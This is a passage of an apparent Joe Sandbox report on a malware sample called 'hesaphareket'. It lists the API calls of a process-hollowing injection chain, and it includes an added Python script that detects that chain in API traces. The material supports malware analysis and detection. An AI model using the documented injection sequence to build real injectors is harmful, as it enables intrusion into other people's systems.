                                                    • Opcode Fuzzy Hash: fe2ca2c33fa441ff58f3c154ba38df2eabcebaa6d2c9c6fbf1fee3f0d03c7f4c
                                                    • Instruction Fuzzy Hash: F15178B09013498FDB54DFA9D548BDEBBF1EF88304F2485A9E409B72A0D7349849CF65

                                                    Control-flow Graph

                                                    control_flow_graph: function at b5cfa0 (node and edge dump omitted)
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 00B5D01E
                                                    • GetCurrentThread.KERNEL32 ref: 00B5D05B
                                                    • GetCurrentProcess.KERNEL32 ref: 00B5D098
                                                    • GetCurrentThreadId.KERNEL32 ref: 00B5D0F1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: e1b7734f2d83294e77d85d52abdfb59b21d24e2b7381672b902ffbe8392d8d46
                                                    • Instruction ID: 71620b877a3df08f5931243c4ff59394d5f50280cde4b2c5cd6ce53d4fa16db5
                                                    • Opcode Fuzzy Hash: e1b7734f2d83294e77d85d52abdfb59b21d24e2b7381672b902ffbe8392d8d46
                                                    • Instruction Fuzzy Hash: C35165B09002499FDB64DFAAD548BDEBBF1EF88300F248499E409B72A0D7709848CF65

                                                    Control-flow Graph

                                                    control_flow_graph: function at 6d57cbc (node and edge dump omitted)
                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06D57EFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 4e529d1a47db2a4560d321e7fe732014501c99bd6cc0ad92fb1ce44f7c9e6331
                                                    • Instruction ID: 2297ae4823f1e74734dcf4d28d6e9289a6a6cf26a2d6fee014d656905116d5c1
                                                    • Opcode Fuzzy Hash: 4e529d1a47db2a4560d321e7fe732014501c99bd6cc0ad92fb1ce44f7c9e6331
                                                    • Instruction Fuzzy Hash: 60A16871D00219CFDF50CF68C841BEDBBB2BF48314F2585AAE848A7690DB759985CF91

                                                    Control-flow Graph

                                                    control_flow_graph: function at 6d57cc8 (node and edge dump omitted)
                                                    APIs
                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06D57EFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 47c77053816bb58a8f3a3b71ed30b081b55ac911701b104fdf4e7a329b04e692
                                                    • Instruction ID: ecaa3548ca9bf0c6e4c9fdf5d1616f680fbfcef5bc90e744b26b329a37af913f
                                                    • Opcode Fuzzy Hash: 47c77053816bb58a8f3a3b71ed30b081b55ac911701b104fdf4e7a329b04e692
                                                    • Instruction Fuzzy Hash: 33917971D00219CFDF60CF68C841BEDBBB2BF48314F2585AAE808A7680DB759985CF91

                                                    Control-flow Graph
                                                    • Function basic blocks b5ad08-b5af88 (graph rendering omitted); GetModuleHandleW is called from block b5af40-b5af6b; internal calls to b5a02c, b5a038, b5a048, b5a058, b5a068, b5af90/b5afa0 and b5b290/b5b2a0.
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00B5AF5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: f617c5254b04fba9e48cd9e513fd8ace0fba5b706510ccc36106accf99eb6da4
                                                    • Instruction ID: a1ef724c7e63b5643420689c0c534d79c072b1d0a1f63d270d43ec3cd09917ea
                                                    • Opcode Fuzzy Hash: f617c5254b04fba9e48cd9e513fd8ace0fba5b706510ccc36106accf99eb6da4
                                                    • Instruction Fuzzy Hash: C9714670A00B058FDB24DF29D44175ABBF1FF88305F108AAEE84AE7A50D775E949CB91

                                                    Control-flow Graph
                                                    • Function basic blocks b558ec-b55a41 (graph rendering omitted); CreateActCtxA is called from block b558ec-b559b9.
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 00B559A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: fe323a4b4dbd35b95b71d905b8ebcb559fa0cad0b7166b145b6da4415e3fd37b
                                                    • Instruction ID: 826817dd78b60b1f923021f00cd5e9b2b420d04eb8fec8ee1911beba63775aae
                                                    • Opcode Fuzzy Hash: fe323a4b4dbd35b95b71d905b8ebcb559fa0cad0b7166b145b6da4415e3fd37b
                                                    • Instruction Fuzzy Hash: DD41F1B1C00619CFDB24CFA9C894BDDBBF1BF49304F2081AAD449AB255DB75694ACF50

                                                    Control-flow Graph
                                                    • Function basic blocks b544b4-b55a41 (graph rendering omitted); CreateActCtxA is called from block b544b4-b559b9.
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 00B559A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: cd225b1b27b43b511b5d9150649338a65b3f522563944d27816e8427b3673226
                                                    • Instruction ID: 542f0d84899ef66fd73009446d57dcf250820897531d8cd6eb09cd6b26c3fd92
                                                    • Opcode Fuzzy Hash: cd225b1b27b43b511b5d9150649338a65b3f522563944d27816e8427b3673226
                                                    • Instruction Fuzzy Hash: E441E1B0C0061DCBDB24DFAAC8847DEBBF5BF48305F2081AAD409AB255DB756949CF90

                                                    Control-flow Graph
                                                    • Function basic blocks 6d5a69f-6d5a77d, entry at 6d5a6fa (graph rendering omitted); PostMessageW is called from block 6d5a69f-6d5a6d2 with message 0x0010 (WM_CLOSE).
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D5A6C5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: a735d96b64f4e19baeac6cfd1c6b12fd7b837de676e99baf42671a4f61bec5ef
                                                    • Instruction ID: 994361b3916d8c622864752a980f10f3a1f47c44c6e5e9053c16336f27cbbb70
                                                    • Opcode Fuzzy Hash: a735d96b64f4e19baeac6cfd1c6b12fd7b837de676e99baf42671a4f61bec5ef
                                                    • Instruction Fuzzy Hash: B221ACB6D002299FDF20DF99D904BEEBBF4AB48300F1A8159D805B7650C779A944CBA0

                                                    Control-flow Graph
                                                    • Function basic blocks 6d57602-6d576de (graph rendering omitted); WriteProcessMemory is called from block 6d57666-6d576a5.
                                                    APIs
                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D57698
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 4dceb9feeb99d0b5382da0641b40bf8959fb268d25b44960eb671a901d02dd31
                                                    • Instruction ID: 8ac107c7cb0979be6d50991945d621b6bb72356d43d5027a27f8742074ae13b2
                                                    • Opcode Fuzzy Hash: 4dceb9feeb99d0b5382da0641b40bf8959fb268d25b44960eb671a901d02dd31
                                                    • Instruction Fuzzy Hash: DF2124B1D003099FDB50DFAAC985BDEBBF5FF48310F10842AE919A7640D778A945CBA0

                                                    Control-flow Graph
                                                    • Function basic blocks 6d57608-6d576de (graph rendering omitted); WriteProcessMemory is called from block 6d57666-6d576a5.
                                                    APIs
                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06D57698
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: b78e2fc453fbdc83945b1ed5e921ea82dad2f2cfc24762b1efe10a77980bdf4d
                                                    • Instruction ID: bec39234728e6d2b5409fc186b29657a2e1c6aca086a92025f3f0ec52c57c957
                                                    • Opcode Fuzzy Hash: b78e2fc453fbdc83945b1ed5e921ea82dad2f2cfc24762b1efe10a77980bdf4d
                                                    • Instruction Fuzzy Hash: 0E2124B1D003099FCB50DFAAC985BDEBBF5FF48310F10842AE919A7240D7789944CBA0
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D574EE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 1302341f89a78a410c7340bca6a9b1026dab0c0daa9294a45aadae181dc1b03b
                                                    • Instruction ID: 6adff29191fb4a2384d628e74e6025bdaf6c614747e2d26caa83e07cf19615a7
                                                    • Opcode Fuzzy Hash: 1302341f89a78a410c7340bca6a9b1026dab0c0daa9294a45aadae181dc1b03b
                                                    • Instruction Fuzzy Hash: 79216AB1D002098FDB10DFAAC4857EEBBF4EF48314F108429D419A7740C778A945CFA0
                                                    APIs
                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06D57BB0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: c205e1aa600a574ea53d431f4b42f02bbeadfaa542f843a2c5a6e2c43dd01ee7
                                                    • Instruction ID: 97c0fd08766e0a1cc57479804b24399731f8f15a080ede0719aa2f7407458c3c
                                                    • Opcode Fuzzy Hash: c205e1aa600a574ea53d431f4b42f02bbeadfaa542f843a2c5a6e2c43dd01ee7
                                                    • Instruction Fuzzy Hash: 9E2136B1C002499FCF10DFAAC881AEEBBF5FF48310F50842AE919A3240C7349944CBA0
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B5D677
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 67a73ee28d209a4a6e7ffab46def834df0f679744ad80c5318f2dd861b307ceb
                                                    • Instruction ID: b1169b55340434932cc2c87fa855148dd3bf52eac9969ea465058b0d80f8f793
                                                    • Opcode Fuzzy Hash: 67a73ee28d209a4a6e7ffab46def834df0f679744ad80c5318f2dd861b307ceb
                                                    • Instruction Fuzzy Hash: 7A21F5B5D00209DFDB10CFAAE584ADEBBF5FB48310F14815AE919A3350D378A945CFA4
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D574EE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: b6ab517a4dadc241ac770a0e200aa287f52171542f8779ffaf83af1c4e13a3fd
                                                    • Instruction ID: c13629d6c0d798d4d05c461f083778f5a63c22121a181ce5c686c0f4752670ff
                                                    • Opcode Fuzzy Hash: b6ab517a4dadc241ac770a0e200aa287f52171542f8779ffaf83af1c4e13a3fd
                                                    • Instruction Fuzzy Hash: E42147B1D003098FDB50DFAAC4857EEBBF4EF88324F10842AD819A7240D778A945CFA0
                                                    APIs
                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06D57BB0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: e4493284667f809117b92a40350758229b8565c2c90f43f2af4e44f8ea4f5707
                                                    • Instruction ID: 0fce2effda429fb7dd957c46baf9edda6a8a2bd209ce24e2cd6b4ee83af930e5
                                                    • Opcode Fuzzy Hash: e4493284667f809117b92a40350758229b8565c2c90f43f2af4e44f8ea4f5707
                                                    • Instruction Fuzzy Hash: 622125B1C002499FCB10DFAAC881AEEFBF5FF48310F50842AE959A7240D7799944CBA0
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B5D677
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 65fc9ced5a214955c5c44a5ce283551761675bf35a9dca2f1f327389d0962dba
                                                    • Instruction ID: 62d5f51367fa5357d98d54caaf62707a09d6e7ae50ac559e551f4757ec381c5e
                                                    • Opcode Fuzzy Hash: 65fc9ced5a214955c5c44a5ce283551761675bf35a9dca2f1f327389d0962dba
                                                    • Instruction Fuzzy Hash: 9821C2B5900249AFDB10CFAAD984ADEBBF9FB48310F14855AE918A3350D374A944CFA5
                                                    APIs
                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06D575B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 4d2d1be03736daf5174c4256486dae64671e7554a1e51764f0f0aef9f14ea5a0
                                                    • Instruction ID: 9b47e2c9db472e1e3b2b26b89cf7ccb0195db13f8f27b2da2fdea40b569a34e2
                                                    • Opcode Fuzzy Hash: 4d2d1be03736daf5174c4256486dae64671e7554a1e51764f0f0aef9f14ea5a0
                                                    • Instruction Fuzzy Hash: 391167B18002099FCB10DFAAC845BEFBFF5EF88320F24841AE519A7650C775A944CFA0
                                                    APIs
                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06D575B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 6109929bc7a10a62d26588c89f4b9fb5b2704c029f329f9afb19021c524e9fc3
                                                    • Instruction ID: eedfb7df8044e6fd787f66e132e31f8b1774257ee137e53d2ef8bb9b9f7dc783
                                                    • Opcode Fuzzy Hash: 6109929bc7a10a62d26588c89f4b9fb5b2704c029f329f9afb19021c524e9fc3
                                                    • Instruction Fuzzy Hash: 601137719002499FCB10DFAAC845AEFBFF5EF88320F208419E519A7250C775A944CFA0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: e090998c6165b05f754bd54277ba5c4cc7aaa04bf745c21445d145b954229b11
                                                    • Instruction ID: 889ca203c394f22d6f3d3e29b554f1a05db624a56e8d2aa1addccd2f0eb76a3a
                                                    • Opcode Fuzzy Hash: e090998c6165b05f754bd54277ba5c4cc7aaa04bf745c21445d145b954229b11
                                                    • Instruction Fuzzy Hash: FC1128B1D002498FDB24DFAAD8457DEFFF9EB88324F248419D419A7640C775A945CBA0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: b8fa24ca0c744ed84593afe21692cd7e3f5f0d9fcad9b4ec4d8c6701ba2f7a21
                                                    • Instruction ID: 897828658a307b2e7228f2f1d81f93377d6d7e1e6b9580ce53108a27cb26f426
                                                    • Opcode Fuzzy Hash: b8fa24ca0c744ed84593afe21692cd7e3f5f0d9fcad9b4ec4d8c6701ba2f7a21
                                                    • Instruction Fuzzy Hash: D21136B1D002498FCB24DFAAD8457DEFFF9EF88324F20841AD419A7640C775A944CBA0
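The functions fingerprinted above (CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread) are the individual steps of the process-hollowing (RunPE) injection that the report flags as "Injects a PE file into a foreign processes". A detection engineer would not alert on any one of these imports, which are common in legitimate software, but on the ordered chain inside a single process. The following script is an added example, not code from the Joe Sandbox report, and shows that correlation over an API-call trace. The trace line format, the `pid=` field and every sample line are constructed for illustration; the addresses in them are not from the report.

```python
"""Order-sensitive detection of the process-hollowing (RunPE) API chain.

Added example (not from the Joe Sandbox report).  The trace format and the
sample lines are constructed; they mirror the report's import chain only.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional, Tuple

# Stages of the RunPE chain in the order a hollowing injector must perform
# them.  Each stage accepts the Win32 name and its Nt* equivalent.
HOLLOWING_CHAIN: Tuple[Tuple[str, frozenset], ...] = (
    ("spawn_suspended", frozenset({"CreateProcessA", "CreateProcessW"})),
    ("alloc_remote", frozenset({"VirtualAllocEx", "NtAllocateVirtualMemory"})),
    ("write_remote", frozenset({"WriteProcessMemory", "NtWriteVirtualMemory"})),
    ("hijack_entry", frozenset({"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"})),
    ("resume", frozenset({"ResumeThread", "NtResumeThread"})),
)

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit, 6th CreateProcess* argument

# Hypothetical trace format, modelled on the report's "Api.MODULE(args), ref:"
# lines plus a sequence number and the calling pid:
#   <seq> pid=<pid> <Api>.<MODULE>(<hex-or-?-args>) ref=<hex>
LINE_RE = re.compile(
    r"^(?P<seq>\d+)\s+pid=(?P<pid>\d+)\s+(?P<api>\w+)\.(?P<mod>\w+)"
    r"\((?P<args>[^)]*)\)\s+ref=(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    seq: int
    pid: int
    api: str
    module: str
    args: List[str] = field(default_factory=list)
    ref: int = 0


def parse_trace(lines: Iterable[str]) -> List[ApiCall]:
    """Parse trace lines into ApiCall records sorted by sequence number."""
    calls = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unparseable trace line: {line!r}")
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(int(m["seq"]), int(m["pid"]), m["api"], m["mod"], args, int(m["ref"], 16)))
    return sorted(calls, key=lambda c: c.seq)


def creation_flags(call: ApiCall) -> Optional[int]:
    """dwCreationFlags of a CreateProcess* call, or None when the trace shows '?'."""
    if len(call.args) > 5 and call.args[5] not in ("", "?"):
        return int(call.args[5], 16)
    return None


def detect_hollowing(calls: Iterable[ApiCall]) -> Dict[int, List[Tuple[str, ApiCall]]]:
    """Return {pid: [(stage, call), ...]} for pids that complete the chain in order.

    A CreateProcess* whose flags are known and lack CREATE_SUSPENDED does not
    start a chain; an unresolved ('?') flag is accepted so sandbox traces with
    unknown arguments still match.  A stage only advances after the previous
    one, so ResumeThread before WriteProcessMemory does not count.
    """
    by_pid: Dict[int, List[ApiCall]] = {}
    for call in calls:
        by_pid.setdefault(call.pid, []).append(call)
    hits: Dict[int, List[Tuple[str, ApiCall]]] = {}
    for pid, seq in by_pid.items():
        stage, matched = 0, []
        for call in seq:
            name, accepted = HOLLOWING_CHAIN[stage]
            if call.api not in accepted:
                continue
            if name == "spawn_suspended":
                flags = creation_flags(call)
                if flags is not None and not flags & CREATE_SUSPENDED:
                    continue
            matched.append((name, call))
            stage += 1
            if stage == len(HOLLOWING_CHAIN):
                hits[pid] = matched
                break
    return hits


# Constructed sample: pid 4120 performs the report's chain in hollowing order;
# pid 5008 spawns a child without CREATE_SUSPENDED (a plain launcher);
# pid 6100 uses the same APIs but resumes the thread before writing.
SAMPLE_TRACE = """
1  pid=4120 GetModuleHandleW.KERNEL32(00000000) ref=1000
2  pid=4120 CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?) ref=1010
3  pid=4120 VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040) ref=1020
4  pid=4120 WriteProcessMemory.KERNEL32(?,?,00000000,?,?) ref=1030
5  pid=4120 ReadProcessMemory.KERNEL32(?,?,?,?,?) ref=1040
6  pid=4120 Wow64SetThreadContext.KERNEL32(?,00000000) ref=1050
7  pid=4120 ResumeThread.KERNEL32(?) ref=1060
8  pid=5008 CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?) ref=2000
9  pid=5008 ResumeThread.KERNEL32(?) ref=2010
10 pid=6100 CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?) ref=3000
11 pid=6100 VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040) ref=3010
12 pid=6100 ResumeThread.KERNEL32(?) ref=3020
13 pid=6100 WriteProcessMemory.KERNEL32(?,?,00000000,?,?) ref=3030
14 pid=6100 SetThreadContext.KERNEL32(?,?) ref=3040
"""


def scan_sample() -> Dict[int, List[str]]:
    """Run the detector over SAMPLE_TRACE; returns {pid: [matched API names]}."""
    hits = detect_hollowing(parse_trace(SAMPLE_TRACE.splitlines()))
    return {pid: [c.api for _, c in chain] for pid, chain in hits.items()}


if __name__ == "__main__":
    for pid, apis in scan_sample().items():
        print(f"pid {pid}: process hollowing chain -> {' -> '.join(apis)}")
```

Only pid 4120 is reported. ReadProcessMemory is deliberately not part of the chain: the injector in this report reads the target's PEB to locate the original image base, but benign debuggers and crash handlers read remote memory too, so it adds noise without discrimination. The Wow64 variant of SetThreadContext is included because the sample is a 32-bit .NET process running under WOW64, which is exactly what the report's import shows.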
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00B5AF5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 5fd8b6a38f20e7f5b06b49e3a43e19709aa6bacf733f3855225c688518aeabf3
                                                    • Instruction ID: a67db515032a011963bb8b4e56849ce732f2d79e7645a65ad534d5dfdba37816
                                                    • Opcode Fuzzy Hash: 5fd8b6a38f20e7f5b06b49e3a43e19709aa6bacf733f3855225c688518aeabf3
                                                    • Instruction Fuzzy Hash: A011DFB6C003498FCB10DF9AD444B9EFBF5EB88314F1085AAD819B7610D379A549CFA1
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D5A6C5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 5a18c740a37c1e47dee597ac9cc5b9924b208f0234c2596672dd7933ec7b31ff
                                                    • Instruction ID: b48fd4d7ee536732410e53d98328b01615d989d4c0d4a157fab80135e8644b00
                                                    • Opcode Fuzzy Hash: 5a18c740a37c1e47dee597ac9cc5b9924b208f0234c2596672dd7933ec7b31ff
                                                    • Instruction Fuzzy Hash: AA11F2B58003499FDB10DF9AD885BDEBBF8EB48314F148419E918B3610C375A944CFA1
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D5A6C5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 33d9600a3f0e4b58da97b2d13dd035e4261385c8f1ff84ee1ac3670632fd2156
                                                    • Instruction ID: db4dd70b9c8fa57957a042e1048ddd7c3e58af1a6acfce88f9a8482b1e224659
                                                    • Opcode Fuzzy Hash: 33d9600a3f0e4b58da97b2d13dd035e4261385c8f1ff84ee1ac3670632fd2156
                                                    • Instruction Fuzzy Hash: BA1122B58007489FCB50DF9AC884BDEBBF8EB48310F108819E918A3600C375A944CFE5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331128369.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_add000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c343056d926dfba4848ef75481399c2de1ea97e7f4c23107e9f318572f1cf391
                                                    • Instruction ID: f435335a12169dea22e623a80ea43b1aeaf3ba85cfe05099f95834ba1b058e63
                                                    • Opcode Fuzzy Hash: c343056d926dfba4848ef75481399c2de1ea97e7f4c23107e9f318572f1cf391
                                                    • Instruction Fuzzy Hash: 9D2125B5504204EFDB05DF14D9C0B26BF75FB98324F20C56AE90A0B35AC336E856CAA2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331196205.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_aed000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a26249c80f56f07671ff3117640f20052a52f817d9fede184631219634d92e0
